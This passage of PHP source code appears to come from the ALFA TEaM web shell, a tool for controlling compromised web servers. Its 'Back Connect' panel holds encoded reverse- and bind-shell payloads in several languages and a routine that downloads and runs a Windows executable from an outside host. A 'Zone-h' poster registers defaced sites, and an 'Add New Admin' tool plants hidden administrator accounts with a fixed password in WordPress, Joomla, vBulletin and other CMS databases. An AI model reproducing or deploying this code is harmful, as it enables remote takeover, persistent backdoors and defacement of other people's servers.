  4080. if(__write_file($path, $evalCode)){
  4081. $cmd = "javac ".$evalOptions.$path;
  4082. alfaEx($cmd);
  4083. $pathres = $filename.".class";
  4084. if(is_file($pathres)){
  4085. if(chmod($pathres, 0755)){
  4086. $cmd = "java ".$filename.$evalArguments;
  4087. alfaEx($cmd);
  4088. }else{$res = $err;}
  4089. unlink($pathres);
  4090. }else{$res = $err;}
  4091. unlink($path);
  4092. }else{$res = $err;}
  4093. }
  4094. return $res;
  4095. }
  4096. return false;
  4097. }
  4098. function alfaconnect(){
  4099. alfahead();
  4100. $php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
  4101. $python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
  4102. $perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
  4103. $ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
  4104. $node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
  4105. $c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
  4106. $java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
  4107. echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
  4108. echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
  4109. <div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
  4110. $cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
  4111. foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
  4112. echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
  4113. if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
  4114. $lang = $_POST['alfa1'];
  4115. $ip = $_POST['alfa2'];
  4116. $port = $_POST['alfa3'];
  4117. $arg =($_POST['alfa4']=='bind'?$port:$port.''.$ip);
  4118. $tmpdir = ALFA_TEMPDIR;
  4119. $name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
  4120. $allow = array('perl','ruby','python','node');
  4121. eval('$lan=$'.$lang.';');
  4122. if(in_array($lang,$allow)){
  4123. if(__write_file($name,__get_resource($lan))){
  4124. if(_alfa_can_runCommand(true,true)){
  4125. $os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
  4126. $out = alfaEx("$lang $name $arg $os");
  4127. if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
  4128. echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
  4129. }
  4130. }else{
  4131. echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
  4132. }
  4133. }
  4134. if($lang=='java'||$lang=='c'){
  4135. $code = __get_resource($lan);
  4136. $out = nl2br(bcinit($lang, $code,'',''));
  4137. echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
  4138. }
  4139. if($lang=='bcwin'){
  4140. $alfa = new AlfaCURL();
  4141. $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
  4142. $tmpdir = ALFA_TEMPDIR;
  4143. $f = @fopen($tmpdir.'/bcwin.exe','w+');
  4144. @fwrite($f, $s);
  4145. @fclose($f);
  4146. $out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
  4147. }
  4148. if($lang=='php'){
  4149. echo "<pre class=ml1 style='margin-top:5px'>";
  4150. $code = __get_resource($lan);
  4151. if($code!==false){
  4152. $code = "\$target = \"".$arg."\";\n".$code;
  4153. eval($code);
  4154. echo("<center><font color='green'>[ Finished...! ]</font></center>");
  4155. }
  4156. echo "</pre>";
  4157. }
  4158. }
  4159. echo "</div>";
  4160. alfafooter();
  4161. }
  4162. function alfazoneh(){
  4163. alfahead();
  4164. echo '<div class=header>';
  4165. if(!function_exists('curl_version')){
  4166. echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
  4167. }
  4168. $hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Serverintrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
  4169. $reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
  4170. echo '
  4171. <center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
  4172. <form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
  4173. <input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
  4174. <br>
  4175. <select id="text" name="hackmode" style="width:400px;">';
  4176. $x=1;
  4177. foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
  4178. echo '</select><br><select id="text" name="reason" style="width:200px;">';
  4179. $x=1;
  4180. foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
  4181. echo '</select><br>
  4182. <textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
  4183. <p><input type="submit" value=" " name="go" /></p>
  4184. </form></center>';
  4185. if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
  4186. ob_start();
  4187. $hacker = $_POST['alfa1'];
  4188. $method = $_POST['alfa2'];
  4189. $neden = $_POST['alfa3'];
  4190. $site = $_POST['alfa4'];
  4191. if(empty($hacker)){
  4192. die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
  4193. }elseif($method == "------------------------------------SELECT-------------------------------------"){
  4194. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
  4195. }elseif($neden == "------------------------------------SELECT-------------------------------------"){
  4196. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
  4197. }elseif(empty($site)){
  4198. die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
  4199. }
  4200. $i = 0;
  4201. $sites = explode("\n", $site);
  4202. $alfa = new AlfaCURL();
  4203. while($i < count($sites)){
  4204. if(substr($sites[$i], 0, 4) != "http"){
  4205. $sites[$i] = "http://".$sites[$i];
  4206. }
  4207. $alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
  4208. ++$i;
  4209. }
  4210. echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
  4211. }
  4212. echo "</div>";
  4213. alfafooter();
  4214. }
  4215. function alfapwchanger(){
  4216. alfahead();
  4217. echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
  4218. <center><h3>';
  4219. $vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
  4220. Alfa_Create_A_Tag('pwchanger',$vals);
  4221. echo '</h3></center>';
  4222. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){
  4223. echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
  4224. <p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
  4225. $table = array('td1' =>
  4226. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4227. 'td2' =>
  4228. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4229. 'td3' =>
  4230. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4231. 'td4' =>
  4232. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4233. 'td5' =>
  4234. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
  4235. 'td6' =>
  4236. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4237. 'td7' =>
  4238. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4239. 'td8' =>
  4240. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4241. );
  4242. create_table($table);
  4243. echo '<p><input value=" " name="send" type="submit"></p></form>';
  4244. if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
  4245. $localhost = $_POST['alfa3'];
  4246. $database = $_POST['alfa4'];
  4247. $username = $_POST['alfa5'];
  4248. $password = $_POST['alfa6'];
  4249. $admin = $_POST['alfa8'];
  4250. $SQL = $_POST['alfa9'];
  4251. $prefix = $_POST['alfa10'];
  4252. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4253. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
  4254. $solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
  4255. $sole = @mysqli_num_rows($solevisible);
  4256. if ($sole == 1){
  4257. $solevis = @mysqli_fetch_assoc($solevisible);$res= $solevis['ID'];
  4258. }
  4259. $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
  4260. if($solevisible){
  4261. __alert('Success... '.$admin.' is created...');}
  4262. }
  4263. }
  4264. if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){
  4265. echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
  4266. $table = array('td1' =>
  4267. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4268. 'td2' =>
  4269. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4270. 'td3' =>
  4271. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4272. 'td4' =>
  4273. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4274. 'td5' =>
  4275. array('color' => 'FFFFFF', 'tdName'=> 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
  4276. 'td6' =>
  4277. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4278. 'td7' =>
  4279. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4280. 'td8' =>
  4281. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4282. );
  4283. create_table($table);
  4284. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4285. if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4286. $localhost = $_POST['alfa3'];
  4287. $database = $_POST['alfa4'];
  4288. $username = $_POST['alfa5'];
  4289. $password = $_POST['alfa6'];
  4290. $admin = $_POST['alfa8'];
  4291. $SQL = $_POST['alfa9'];
  4292. $prefix = $_POST['alfa10'];
  4293. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4294. $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
  4295. $solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
  4296. $sole =@mysqli_num_rows($solevisible);
  4297. if ($sole == 1){
  4298. $solevis =@mysqli_fetch_assoc($solevisible);
  4299. $res = $solevis['id'];
  4300. }
  4301. $solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
  4302. if($solevisible){
  4303. __alert('Success... '.$admin.' is created...');}
  4304. }
  4305. }
  4306. if($_POST['alfa4'] && $_POST['alfa4'] == 'vb'){
  4307. echo __pre().'<center><center><div class="txtfont_header">| vBulletin |<div><p>'.getConfigHtml('vb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,\'vb\',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">';
  4308. $table = array('td1' =>
  4309. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4310. 'td2' =>
  4311. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize'=> '50'),
  4312. 'td3' =>
  4313. array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
  4314. 'td4' =>
  4315. array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
  4316. 'td5' =>
  4317. array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
  4318. 'td6' =>
  4319. array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
  4320. 'td7' =>
  4321. array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
  4322. 'td8' =>
  4323. array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
  4324. );
  4325. create_table($table);
  4326. echo '<p><input value=" " name="send" type="submit"></p></form></center>';
  4327. if($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
  4328. $localhost = $_POST['alfa2'];
  4329. $database = $_POST['alfa3'];
  4330. $username = $_POST['alfa5'];
  4331. $password = $_POST['alfa6'];
  4332. $prefix = $_POST['alfa7'];
  4333. $admin = $_POST['alfa8'];
  4334. $SQL = $_POST['alfa9'];
  4335. $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
  4336. $solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','$SQL','".date('Y-m-d')."','".time()."')") or die(mysqli_error($conn));
  4337. $solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
  4338. $sole = mysqli_num_rows($solevisible);
  4339. if($sole == 1){
  4340. $solevis = mysqli_fetch_assoc($solevisible);
  4341. $res = $solevis['userid'];
  4342. }
  4343. $solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','16744444')") or die(mysqli_error($conn));
  4344. if($solevisible){
  4345. __alert('Success... '.$admin.' is created...');}
  4346. }
  4347. }
  4348. if(isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb'){
  4349. echo __pre().'<center><div class="txtfont_header">| phpBB |</div><p><p>'.getConfigHtml('phpbb').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,this.username.value,\'phpbb\',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">';
  4350. $table = array('td1' =>
  4351. array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
  4352. 'td2' =>
  4353. array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
  4354. 'td3' =>
